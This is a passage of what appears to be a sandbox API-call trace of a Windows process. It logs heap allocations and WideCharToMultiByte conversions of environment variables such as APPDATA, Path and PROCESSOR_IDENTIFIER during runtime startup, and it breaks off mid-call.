\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x1c÷Ø\x0eøé\x18", lpUsedDefaultChar=0x0) returned 256 [0163.531] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0163.531] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x40467c [0163.573] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280960) returned 0x80 [0163.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0163.591] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1f) returned 0x27f3b8 [0163.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x27f3b8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0163.613] GetLastError () returned 0x0 [0163.613] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x281fc0, Size=0x8) returned 0x281fc0 [0163.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0163.613] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x36) returned 0x280c10 [0163.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x280c10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 54 [0163.613] GetLastError () returned 0x0 [0163.623] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x281fc0, Size=0xc) returned 0x281fc0 [0163.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0163.624] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x37) returned 0x280c50 [0163.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x280c50, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0163.624] GetLastError () returned 0x0 [0163.624] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x281fc0, Size=0x10) returned 0x281fc0 [0163.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0163.624] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x3c) returned 0x2759b8 [0163.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x2759b8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0163.624] GetLastError () returned 0x0 [0163.624] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x281fc0, Size=0x14) returned 0x281fc0 [0163.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0163.624] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x31) returned 0x280c90 [0163.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x280c90, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0163.624] GetLastError () returned 0x0 [0163.624] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x281fc0, Size=0x18) returned 0x281fc0 [0163.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0163.624] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x17) returned 0x280cd0 [0163.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x280cd0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=XDUWTFONO", lpUsedDefaultChar=0x0) returned 23 [0163.625] GetLastError () returned 0x0 [0163.625] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x281fc0, Size=0x1c) returned 0x281fc0 [0163.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0163.625] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x24) returned 0x27ac60 [0163.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x27ac60, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0163.625] GetLastError () returned 0x0 [0163.625] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x281fc0, Size=0x20) returned 0x281fc0 [0163.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0163.625] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x14) returned 0x280cf0 [0163.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x280cf0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0163.625] GetLastError () returned 0x0 [0163.625] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x281fc0, Size=0x24) returned 0x280d10 [0163.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0163.625] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xd) returned 0x27e990 [0163.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x27e990, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0163.625] GetLastError () returned 0x0 [0163.625] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280d10, Size=0x28) returned 0x280d10 [0163.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0163.625] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x25) returned 0x27ac90 [0163.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x27ac90, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 37 [0163.625] GetLastError () returned 0x0 [0163.626] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280d10, Size=0x2c) returned 0x280d10 [0163.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0163.626] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x39) returned 0x275a00 [0163.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x275a00, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpUsedDefaultChar=0x0) returned 57 [0163.626] GetLastError () returned 0x0 [0163.626] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280d10, Size=0x30) returned 0x280d10 [0163.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0163.626] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x18) returned 0x281fc0 [0163.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x281fc0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\XDUWTFONO", lpUsedDefaultChar=0x0) returned 24 [0163.626] GetLastError () returned 0x0 [0163.626] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280d10, Size=0x34) returned 0x280d10 [0163.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0163.626] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x17) returned 0x280d50 [0163.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x280d50, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0163.626] GetLastError () returned 0x0 [0163.626] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280d10, Size=0x38) returned 0x280d10 [0163.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0163.626] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xe) returned 0x27e9a8 [0163.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x27e9a8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0163.626] GetLastError () returned 0x0 [0163.626] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280d10, Size=0x3c) returned 0x280d70 [0163.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0163.626] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x69) returned 0x280db8 [0163.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x280db8, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 105 [0163.627] GetLastError () returned 0x0 [0163.627] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280d70, Size=0x40) returned 0x280d70 [0163.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0163.627] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x3e) returned 0x275a48 [0163.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x275a48, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0163.627] GetLastError () returned 0x0 [0163.627] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280d70, Size=0x44) returned 0x280e30 [0163.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0163.627] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1b) returned 0x27f3e0 [0163.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x27f3e0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0163.627] GetLastError () returned 0x0 [0163.627] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280e30, Size=0x48) returned 0x280e30 [0163.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0163.627] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1d) returned 0x27f408 [0163.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x27f408, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0163.627] GetLastError () returned 0x0 [0163.627] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280e30, Size=0x4c) returned 0x280e30 [0163.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0163.627] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x48) returned 0x276e38 [0163.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x276e38, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0163.627] GetLastError () returned 0x0 [0163.627] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280e30, Size=0x50) returned 0x280e30 [0163.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0163.627] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x12) returned 0x280d10 [0163.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x280d10, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0163.628] GetLastError () returned 0x0 [0163.628] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280e30, Size=0x54) returned 0x280e30 [0163.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0163.628] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x18) returned 0x280d30 [0163.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x280d30, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0163.628] GetLastError () returned 0x0 [0163.628] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280e30, Size=0x58) returned 0x280e30 [0163.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0163.628] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1b) returned 0x27f430 [0163.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x27f430, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0163.628] GetLastError () returned 0x0 [0163.628] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280e30, Size=0x5c) returned 0x280e30 [0163.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0163.628] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x24) returned 0x27acc0 [0163.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x27acc0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0163.628] GetLastError () returned 0x0 [0163.628] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280e30, Size=0x60) returned 0x280e30 [0163.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0163.628] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x29) returned 0x27b398 [0163.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x27b398, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0163.629] GetLastError () returned 0x0 [0163.629] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280e30, Size=0x64) returned 0x280e30 [0163.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0163.629] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1e) returned 0x27f458 [0163.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x27f458, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0163.629] GetLastError () returned 0x0 [0163.629] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280e30, Size=0x68) returned 0x280e30 [0163.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0163.629] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x41) returned 0x276e88 [0163.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x276e88, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpUsedDefaultChar=0x0) returned 65 [0163.629] GetLastError () returned 0x0 [0163.629] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280e30, Size=0x6c) returned 0x280e30 [0163.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, 